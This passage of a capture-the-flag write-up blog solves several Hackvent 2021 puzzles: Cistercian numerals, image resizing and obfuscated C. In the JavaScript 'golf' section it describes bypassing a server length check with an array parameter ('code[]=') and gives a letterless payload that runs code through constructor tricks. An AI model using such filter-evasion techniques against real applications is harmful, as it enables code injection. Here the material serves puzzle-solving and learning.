https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-18-768x545.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-18-1536x1089.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-18.png 1760w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Peace and prosperity &#8211; and, you know&#8230; the flag<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>Step 1: On the image we see cistercian numbers. We can decode them with the website <a href=\"https:\/\/www.dcode.fr\/cistercian-numbers\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.dcode.fr\/cistercian-numbers<\/a>. 
The result is:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">2314 6344 6333 4675 2268 3533 763 5940 1707 7377 4022 4870 7382 6109 385 4221<\/pre>\n\n\n\n<p>Step 2: We convert all the numbers into their binary representation and <strong>add leading zeros<\/strong> to all numbers which have fewer than 13 binary digits. This second step took hours to guess.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0100100001010\n1100011001000\n1100010111101\n1001001000011\n0100011011100\n0110111001101\n0001011111011\n1011100110100\n0011010101011\n1110011010001\n0111110110110\n1001100000110\n1110011010110\n1011111011101\n0000110000001\n1000001111101<\/pre>\n\n\n\n<p>Step 3: We read the resulting bit stream as 8-bit ASCII characters and get the flag. This can be done automatically with <a href=\"https:\/\/gchq.github.io\/CyberChef\/#recipe=From_Binary('Space',8)&amp;input=MDEwMDEwMDAwMTAxMAoxMTAwMDExMDAxMDAwCjExMDAwMTAxMTExMDEKMTAwMTAwMTAwMDAxMQowMTAwMDExMDExMTAwCjAxMTAxMTEwMDExMDEKMDAwMTAxMTExMTAxMQoxMDExMTAwMTEwMTAwCjAwMTEwMTAxMDEwMTEKMTExMDAxMTAxMDAwMQowMTExMTEwMTEwMTEwCjEwMDExMDAwMDAxMTAKMTExMDAxMTAxMDExMAoxMDExMTExMDExMTAxCjAwMDAxMTAwMDAwMDEKMTAwMDAwMTExMTEwMQ\" target=\"_blank\" rel=\"noreferrer noopener\">CyberChef<\/a>. 
<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{$4n74_w45_4_m0nk_t00}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.10] Christmas Trophy<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"114\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-19.png\" alt=\"\" class=\"wp-image-1719\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-19.png 830w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-19-300x41.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-19-768x105.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>ice<\/em>. Hole in one!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The elves thought Santa should relax a bit, so they&#8217;re inviting him to a round of golf. But the organizers must have understood, when they get there, what they get is keyboards instead of clubs!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Write JS code that prints&nbsp;<code>Hackvent<\/code>&nbsp;without using characters from&nbsp;<code>a-z<\/code>,&nbsp;<code>A-Z<\/code>,&nbsp;<code>\\<\/code>,&nbsp;<code>:<\/code>&nbsp;or&nbsp;<code>_<\/code>. 
The code should be at most 400 characters.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"379\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-20-1024x379.png\" alt=\"\" class=\"wp-image-1720\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-20-1024x379.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-20-300x111.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-20-768x284.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-20-1536x568.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-20-2048x757.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">const express = require('express');\nconst path = require('path');\nconst vm = require('vm');\nconst hbs = require('hbs');\nconst app = express();\nconst flag = require('.\/flag');\napp.set('views', path.join(__dirname, 'views'));\napp.set('view engine', 'hbs');\napp.get('\/', function (req, res) {\n    let output = '';\n    const code = req.query.code;\n    if (code &amp;&amp; code.length &lt; 400 &amp;&amp; \/^[^a-zA-Z\\\\\\:\\_]*$\/.test(code)) {\n        try {\n            const result = new vm.Script(code).runInNewContext(undefined, {timeout: 500});\n            if (result === 'Hackvent') {\n                output = flag;\n            } else {\n                output = \"Bad result: \" + result;\n            }\n        } catch (e) {\n            console.log(e);\n            output = 'Exception :(';\n        }\n    } else {\n        output = \"Bad code\";\n    }\n    res.render('index', {output});\n});\napp.get('\/source', function (req, res) {\n    
res.sendFile(path.join(__dirname, 'app.js'));\n});\nmodule.exports = app;<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>I had a lot of trouble solving this challenge. This was one of the challenges which I didn&#8217;t solve within 24 hours. <\/p>\n\n\n\n<p>I only solved the challenge because there is an (unintended) bug in the page, which allows submitting payloads longer than 400 characters. When submitting the code you can change the parameter from &#8220;code=&#8221; to &#8220;code[]=&#8221;. This turns the code variable into an array with one item, so its length is 1 and the size check in the if clause passes &#8211; even if the code is longer than 400 characters. <\/p>\n\n\n\n<p>To create my solution I used the online NodeJS debugger <a rel=\"noreferrer noopener\" href=\"https:\/\/replit.com\/languages\/nodejs\" target=\"_blank\">https:\/\/replit.com\/languages\/nodejs<\/a> and I also ran the application locally myself. I first worked out a script which prints &#8220;Hackvent&#8221; and respects all the limitations except the length. To get the characters &#8220;S&#8221;, &#8220;g&#8221;, &#8220;m&#8221; and &#8220;C&#8221; I created the following loop which returns the string.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\"0logwarndirtimetimeEndtimeLogtraceassertclearcountcountResetgroupgroupEndtabledebuginfodirxmlerrorgroupCollapsedConsoleprofileprofileEndtimeStampcontext\" <\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">i = 0; for (x in console) {\n  i += x;\n}<\/pre>\n\n\n\n<p>I assign the result of the loop to a variable so that I can reference it later and get all the missing characters. 
The script which prints &#8220;Hackvent&#8221; looks like this:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">let c = ({} + \"\")[5];\nlet o = ({} + \"\")[1];\nlet n = ({}[1] + \"\")[1];\nlet s = ((\".\"==\"\")+\"\")[3];\nlet t = ((\"\"==\"\")+\"\")[0];\nlet r = ((\"\"==\"\")+\"\")[1];\nlet u = ((\"\"==\"\")+\"\")[2];\nlet e = ((\"\"==\"\")+\"\")[3];\nlet l = ((\".\"==\"\")+\"\")[2];\nlet f = ({}[1] + \"\")[4];\nlet i = ({}[1] + \"\")[5];\nlet a = ((\".\" - 1)+\"\")[1];\nlet d = ({}[1] + \"\")[2];\nlet _constructor = c + o + n + s + t + r + u + c + t + o + r;\nlet _return = r + e + t + u + r + n;\nlet _console = c + o + n + s + o + l + e;\nlet _flat = f+l+a+t;\nlet _find = f+i+n+d;\nlet _for = f + o + r;\nlet _in = i + n;\nlet _loop = \"(\u00e4 = '');\" + _for + \"(\u00f6 \" + _in + \" \" + _console + \") {( \u00e4 += \u00f6 )}\" + _return + \" \u00e4\"\nlet res = [][_find][_constructor](_loop)()\nconsole.log(res)\nlet _String = res[139]+t+r+i+n+res[2]\nlet _toString = t+o+_String\nlet h = (+(1+[0]+[1]))[_toString](2+[1])[1]\nlet _fromcharcode = f+r+o+res[12]+res[102]+h+a+r+res[102]+o+d+e\nconsole.log(_fromcharcode)\nlet solution = [][_flat][_constructor](_return + \" \" + _String +\".\"+_fromcharcode+\"(72,97,99,107,118,101,110,116)\")()\nconsole.log(solution)<\/pre>\n\n\n\n<p>Now, we need to create the final payload which we can send to the server. 
<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">let c = \"({} + '')[5]\"\nlet o = \"({} + '')[1]\"\nlet n = \"({}[1] + '')[1]\"\nlet s = \"(('.'=='')+'')[3]\"\nlet t = \"((''=='')+'')[0]\"\nlet r = \"((''=='')+'')[1]\"\nlet u = \"((''=='')+'')[2]\"\nlet e = \"((''=='')+'')[3]\"\nlet l = \"(('.'=='')+'')[2]\"\nlet f = \"({}[1] + '')[4]\"\nlet i = \"({}[1] + '')[5]\"\nlet a = \"(('.' - 1)+'')[1]\"\nlet d = \"({}[1] + '')[2]\"\nlet _constructor = c + \"+\" + o + \"+\"+n + \"+\" + s + \"+\" + t + \"+\" + r + \"+\" + u + \"+\" + c + \"+\" + t + \"+\" + o + \"+\" + r\nlet _return = r + \"+\" + e + \"+\" + t + \"+\" + u + \"+\" + r + \"+\" + n\nlet _console = c + \"+\" + o + \"+\" + n + \"+\" + s + \"+\" + o + \"+\" + l + \"+\" + e\nlet _flat = f+ \"+\" +l+ \"+\" +a+ \"+\" +t\nlet _find = f+ \"+\" +i+ \"+\" +n+ \"+\" +d\nlet _for = f + \"+\" + o + \"+\" + r\nlet _in = i + \"+\" + n\nlet _loop = \"\\\"(\u00e4 = '');\\\"+\" + _for + \"+\\\"(\u00f6 \\\"+\" + _in + \"+\\\" \\\"+\" + _console + \"+\\\"){ \u00e4 += \u00f6 }\\\"+\" + _return + \"+\\\" \u00e4;\\\"\"\nlet res = \"[][\"+_find+\"][\"+_constructor+\"](\"+_loop+\")()\"\nconsole.log(\"[][\"+_find+\"][\"+_constructor+\"](\"+\"XXXXX)()\")\nconsole.log(\"Loop:\")\nconsole.log(_loop)\nconsole.log(\"######\")\nconsole.log(\"[][\"+_find+\"][\"+_constructor+\"](\"+_loop+\")()\")\n$=[][({}[1]+'')[4]+({}[1]+'')[5]+({}[1]+'')[1]+({}[1]+'')[2]][({}+'')[5]+({}+'')[1]+({}[1]+'')[1]+(('.'=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[1]+((''=='')+'')[2]+({}+'')[5]+((''=='')+'')[0]+({}+'')[1]+((''=='')+'')[1]]('(\u00e4=0);'+({}[1]+'')[4]+({}+'')[1]+((''=='')+'')[1]+'(\u00f6 '+({}[1]+'')[5]+({}[1] + '')[1]+' '+({} + '')[5]+({} + '')[1]+({}[1] + '')[1]+(('.'=='')+'')[3]+({} + 
'')[1]+(('.'=='')+'')[2]+((''=='')+'')[3]+'){\u00e4+=\u00f6}'+((''=='')+'')[1]+((''=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[2]+((''=='')+'')[1]+({}[1] + '')[1]+' \u00e4;')();\nconsole.log(\"-----> \" + $[157])\nconsole.log(\"------------\")\nlet _String = \"$[157]+\"+ t + \"+\" + r + \"+\" + i + \"+\" + n + \"+\" + \"$[5]\"\nlet _toString = t + \"+\" + o + \"+\" + _String\nlet h = \"(+(1+[0]+[1]))[\" + _toString +\"](2+[1])[1]\"\nconsole.log(_String)\nconsole.log(_toString)\nconsole.log(h)\nlet _fromcharcode = f+ \"+\" +r+ \"+\" +o+ \"+$[29]+$[51]+\"+h+\"+\" +a+ \"+\" +r+ \"+$[51]+ \"+o+ \"+\" +d+ \"+\" +e\nconsole.log(\"From-CharCode:\")\nconsole.log(_fromcharcode)\nconsole.log(\"------------\")\nlet _sol = _return + \"+\\\" \\\"+\" +_String + \"+\\\".\\\"+\" +_fromcharcode +\"+\\\"(72,97,99,107,118,101,110,116)\\\"\"\nlet _solution =\"[][\"+_find+\"][\"+_constructor+\"](\"+_sol+\")()\"\nconsole.log(\"Solution:\")\nconsole.log(\"$=[][({}[1]+'')[4]+({}[1]+'')[5]+({}[1]+'')[1]+({}[1]+'')[2]][({}+'')[5]+({}+'')[1]+({}[1]+'')[1]+(('.'=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[1]+((''=='')+'')[2]+({}+'')[5]+((''=='')+'')[0]+({}+'')[1]+((''=='')+'')[1]]('(\u00e4=0);'+({}[1]+'')[4]+({}+'')[1]+((''=='')+'')[1]+'(\u00f6 '+({}[1]+'')[5]+({}[1] + '')[1]+' '+({} + '')[5]+({} + '')[1]+({}[1] + '')[1]+(('.'=='')+'')[3]+({} + '')[1]+(('.'=='')+'')[2]+((''=='')+'')[3]+'){\u00e4+=\u00f6}'+((''=='')+'')[1]+((''=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[2]+((''=='')+'')[1]+({}[1] + '')[1]+' \u00e4;')();\")\nconsole.log(_solution)\nconsole.log(\"------------\")<\/pre>\n\n\n\n<p>Among many debug messages this script prints the payload which we can send to the server. The length of the payload is 1285 characters though, therefore we need to circumvent the length check as described in the beginning. 
<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$=[][({}[1]+'')[4]+({}[1]+'')[5]+({}[1]+'')[1]+({}[1]+'')[2]][({}+'')[5]+({}+'')[1]+({}[1]+'')[1]+(('.'=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[1]+((''=='')+'')[2]+({}+'')[5]+((''=='')+'')[0]+({}+'')[1]+((''=='')+'')[1]]('(\u00e4=0);'+({}[1]+'')[4]+({}+'')[1]+((''=='')+'')[1]+'(\u00f6 '+({}[1]+'')[5]+({}[1] + '')[1]+' '+({} + '')[5]+({} + '')[1]+({}[1] + '')[1]+(('.'=='')+'')[3]+({} + '')[1]+(('.'=='')+'')[2]+((''=='')+'')[3]+'){\u00e4+=\u00f6}'+((''=='')+'')[1]+((''=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[2]+((''=='')+'')[1]+({}[1] + '')[1]+' \u00e4;')();\n[][({}[1] + '')[4]+({}[1] + '')[5]+({}[1] + '')[1]+({}[1] + '')[2]][({} + '')[5]+({} + '')[1]+({}[1] + '')[1]+(('.'=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[1]+((''=='')+'')[2]+({} + '')[5]+((''=='')+'')[0]+({} + '')[1]+((''=='')+'')[1]](((''=='')+'')[1]+((''=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[2]+((''=='')+'')[1]+({}[1] + '')[1]+\" \"+$[157]+((''=='')+'')[0]+((''=='')+'')[1]+({}[1] + '')[5]+({}[1] + '')[1]+$[5]+\".\"+({}[1] + '')[4]+((''=='')+'')[1]+({} + '')[1]+$[29]+$[51]+(+(1+[0]+[1]))[((''=='')+'')[0]+({} + '')[1]+$[157]+((''=='')+'')[0]+((''=='')+'')[1]+({}[1] + '')[5]+({}[1] + '')[1]+$[5]](2+[1])[1]+(('.' 
- 1)+'')[1]+((''=='')+'')[1]+$[51]+ ({} + '')[1]+({}[1] + '')[2]+((''=='')+'')[3]+\"(72,97,99,107,118,101,110,116)\")()<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/solution-1-1024x361.png\" alt=\"\" class=\"wp-image-1772\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{W4NN4 G0 G0LFING T0M0RR0W?}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.11] Oversized Gifts<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"824\" height=\"116\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-21.png\" alt=\"\" class=\"wp-image-1722\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-21.png 824w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-21-300x42.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-21-768x108.png 768w\" sizes=\"auto, (max-width: 824px) 100vw, 824px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>darkstar<\/em>. Ho, ho, ho&#8230;ly cow, that&#8217;s big!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>To ensure that Santa does not have to carry such a heavy load, our elves are always trying to shrink the gifts as much as possible. New technologies are constantly being developed in our laboratories. 
Unfortunately, an incident occurred during a test, when restoring the original size, an error occurred and now we are no longer able to achieve the original size.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Are you able to achieve an acceptable size?<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/72d85b7f-4325-432e-93ff-cfdc019306c6.png.bz2\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"989\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-22-1024x989.png\" alt=\"\" class=\"wp-image-1723\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-22-1024x989.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-22-300x290.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-22-768x742.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-22.png 1346w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\"><em>This picture is purely illustrative &#8211; we thought a bit of color might be nice \ud83d\ude09 Download the linked file!<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>This is one of the challenges that were very resource-intensive, and I struggled with my office laptop to solve it, as it took several hours to complete. <\/p>\n\n\n\n<p>The challenge requests us to resize a very large image. The problem is that we cannot open the image with any tool because it is too large. Luckily, I found a program which can open the image and do the resizing for me. With <a rel=\"noreferrer noopener\" href=\"https:\/\/www.libvips.org\/\" target=\"_blank\">libvips<\/a> the image can be resized and we get the QR code. 
<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ vips resize 72d85b7f-4325-432e-93ff-cfdc019306c6.png out.png 0.0078125 --vips-progress\nvips temp-21: 7104 x 7104 pixels, 8 threads, 128 x 128 tiles, 256 lines in buffer<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag-1-2024x1024.png\" alt=\"\" class=\"wp-image-1773\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{You_can_never_have_enough_RAM!}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21-Hidden] What? There is More?<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"816\" height=\"116\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-23.png\" alt=\"\" class=\"wp-image-1724\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-23.png 816w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-23-300x43.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-23-768x109.png 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/figure>\n\n\n\n<p>What? You found another one? Lucky you!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>The hidden challenge can be solved with the same libvips program as the main challenge. I struggled even more with my laptop here. I had to reboot the notebook, add extra swap space and keep the computer running overnight to get the hidden flag. <\/p>\n\n\n\n<p>In the large QR code a second small one is hidden. With the libvips program we can create tiles and find the second QR code inside. 
<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ vips dzsave --depth one --tile-size=1024 --vips-progress 72d85b7f-4325-432e-93ff-cfdc019306c6.png hidden.png<\/pre>\n\n\n\n<p>This command creates a folder with 788544 images inside! Because the QR code has more content than the other images, we can sort the folder by size and the largest file contains the hidden QR code.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/hidden-1024x1024.jpeg\" alt=\"\" class=\"wp-image-1774\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{It&#8217;s_like_finding_a_needle_in_a_haystack}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.12] Santa&#8217;s Shuffle<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"816\" height=\"122\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-24.png\" alt=\"\" class=\"wp-image-1725\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-24.png 816w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-24-300x45.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-24-768x115.png 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>2d3<\/em>. What a beautiful mess!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Oh no, the elves have forgotten to close the windows and the draft made mess of Santa&#8217;s code! 
Maybe you could clean it up?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you help Santa clean up&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/434eb425-6597-4fd0-bbd8-6f6e427a5f72.txt\" target=\"_blank\" rel=\"noreferrer noopener\">this chaos<\/a>?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>This challenge looked pretty hard at first sight. Fortunately it wasn&#8217;t. I tried a new online tool, <a rel=\"noreferrer noopener\" href=\"https:\/\/www.onlinegdb.com\" target=\"_blank\">https:\/\/www.onlinegdb.com<\/a>, to solve this challenge. <\/p>\n\n\n\n<p>First, I beautified the code. Then, I used the debugger to step through the code. I discovered that the R(2) function call stops the application, when the input is wrong. Thus, I simply replaced all R(2) calls with 0x90 and got the flag:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include\/*502_-_zU3X)}tM1#Hq$4D\"35*\/&lt;stdio.h>\/\/W6juf:tvs.]DrIoMM(axv0@|k?+jkES5r\n#define\/*&amp;jhm|0zs(*\/B\/*zDq|:OHcU~Dv|;7,FE)9s(Ue!5gM*\/break\t\/\/v9BF(TT1Gq\"19#?kJ2*H\n#define\/*JH8gDjl*\/C(x)\/*c9UOy:3*\/case\/*@MgHEK+94c9*\/x\/*bb]V+F#*\/:\t\/\/u$T._.$ms'cjF\n#define\/*XSGrEWMy94I!VMe_n*\/E(x)\/*UUG9F{)zJB*\/else\/*CJsY*9D|SfgQ-XL*\/x\t\/\/s{2GfRjU\n#define\/*jDdwh4pU,*\/F(x)\/*@48h|llEw&amp;qpgsJl7ifhb)*\/if\/*ux7-7_$}9*P*\/(x)\t\/\/s0qQes26\n#define\/*6#ZZoxYnO4xaPrjtX!?4IFw.o(J.F!aw;l1J*\/G\/*(K)A*N^+.p#'*\/getchar\/\/R3k7&amp;Fz\n#define\/*i3pPy[qc!eLd1x*\/H\/*yUP\"V{xqnjY*\/char\/\/9hek:99{qBf[JY4J]IQ(|uC?fP\"l+vyI8\n#define\/*&amp;#AH67b)-BfgJ*\/I(x)\/*3*N):*@uqGsPWx8qa6@m6Jh*\/int 
x\t\/\/FR9+X'O:zMD(h4vS1I\n#define\/*hJ5*\/N(x)\/*rjl|(eQP#|z*\/const\/*7,XJg5(b{55*\/x\t\/\/{v|REgeXz(Lt4i!ip}t$4NFO\n#define\/*KHZ4M6Iisfr*-*\/P\/*1=j~}wrY*,{Ed$LBv6RFjZL$.!~dYEQ,!nLcP*\/putchar\t\/\/%cf1H\n#define\/*NNpSIo2OmEA~By*\/R(x)\/*KO5g{I.-}d4*\/return\/*B1W|t9J#IMl*\/x\t\/\/&amp;{GOKv%1DeOR\n#define\/*{2&amp;kPmy$}*\/S\/*We3LM~2)9-S+vv0\"]F*\/switch\/\/(d't:h%G1PW'PMq:YT$99wc'Armhm\n#define\/*@:ZX?_W)3Ow*\/U(x)\/*m.ZxP@*\/unsigned\/*@':qb8*\/x\/\/Z0GPh4pWKUeua|U$V0JqZz0\n#define\/*1b*\/W(x)\/*A8M{Ww*\/while\/*lZ8(@={auRxbu(0pQ48vR]Y*\/(x)\t\/\/-gw7zlWYT.LW+rE3\nN (H) * d = \"\\0329>\\036=\\016\" \/*FzeM,;=3;T@Ddy_k}.3$Z? *\/ \"b\\040\\012!9\\016\"\t\/*uKjE\"vL!jSf\n\t\t\t\t\t\t\t\t         Ua&amp;hW[A#{mRI3s|ZsKm[9Hy *\/ \"\\034b\\0377b>\\035?-\\036=*\\xff\", *b = \"++T*+$T#+\"\n\t\t\t\t\t\t\t\t      \/*-4TuyBux\n\t\t\t\t\t\tR*\/ \"G++!}++g+Jn+'[{>qb+\/$++S+!H+:;v+Ig+*ut\"\n\t\t\t\t\t\t\/*#]UMNDx7&amp;g1Db08'fA?dG~;!$Agqcj9d7kY\n\t\t\t\t\t\t   Pb:6=LN:#n7g1^jEa(^~#Esv^?KT@_v7mv:)Gs:=84A'6d52X3:z'}Yc@ *\/\n  \">x0+t(++({+jy$+;1_+\"\n  \"&amp;(+4+%D+>%2++e+@+\" \/*.AdT0D+}1'2Y* *\/ \"6(E+^>+&amp;P+:^$++{TY+#46>^+'+++)~+\"\t\/*medVBKLr\n\t\t\t\t\t\t\t\t   |KgL,VcJT#h!C#3;YgsyYEW *\/ \"+'eH+++)\/+=+_q+\/S_>2+++cdX+P\"\n\t\t\t\t\t\t\t\t\/*pYGWqg@*YTM,{Oz,R:lfL3A\n\t\t\t\t\t\t\t\t   jmBLNi~9D~lXv9|Ro);*^CVq6pZ&amp;?kX6e1sY=)R;?eEO.=-jC5V *\/\n  \"&lt;'&lt;_X&lt;;&lt;&lt;4&lt;-&amp;]g:>++Q.DcG>\"\n  \"h-_*-\/@i-*-2.>tw#.NG\" \/*Sk3NzCn9HK[Xbmh)ZBNxOU6&amp;(4CsDo9HN *\/ \">-c_._>+'pk+_%d+\"\t\/*e\n\t\t\t\t\t\t\t\t\t\t\t   KkKW=SK%N^sG?J{BDv]beCstKi9AM;W]dc@0;VBGPQZPK9Nm *\/\n  \".>wHB+(+5kD+gXc++=.h[l[;q-:]\"\n  \"9X~&lt;u]-5{C,2o+V[fx\" 